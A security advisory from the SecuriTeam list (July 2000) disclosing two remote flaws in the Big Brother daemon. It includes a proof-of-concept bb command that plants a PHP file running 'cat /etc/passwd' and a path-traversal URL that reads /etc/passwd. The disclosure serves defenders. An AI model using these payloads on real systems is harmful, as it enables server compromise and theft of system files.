Subject: [NEWS] Two new Big Brother vulnerabilities
Date: Fri, 14 Jul 2000 21:33:00 +0200

g security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

          Two new Big Brother vulnerabilities
--------------------------------------------------------------------------------

SUMMARY

The  <http://bb4.com/> Big Brother daemon listens for incoming connections
on port 1984. Two separate security holes allow remote attackers to read
and write arbitrary files on the system, entirely compromising the
server's security.

DETAILS

Vulnerable systems:
Big Brother 1.4h2 (only writing files)
Big Brother version 1.4h (both vulnerabilities)

Immune systems:
Big Brother version 1.4h2 (immune against reading arbitrary files)

First Vulnerability:

The following command:
$ ./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"
(NOTE: The bb program is the Big Brother client)
Will show the /etc/passwd upon browsing to:
http://1.2.3.4/bb/logs/evil.php3

Second Vulnerability:
The second problem exists in the code where $HOSTSVC does not do
authenticity checking for its assigned variable.

 ---- snip ----
 # get the color of the status from the status file
 set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1"
 ---- snap ----

Example:
The following URL:
http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
Will retrieve the /etc/passwd file.

ADDITIONAL INFORMATION

The information has been provided by  <mailto:xternal1@YAHOO.COM> xternal
and  <mailto:eric.hines@NUASIS.COM> Eric Hines.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.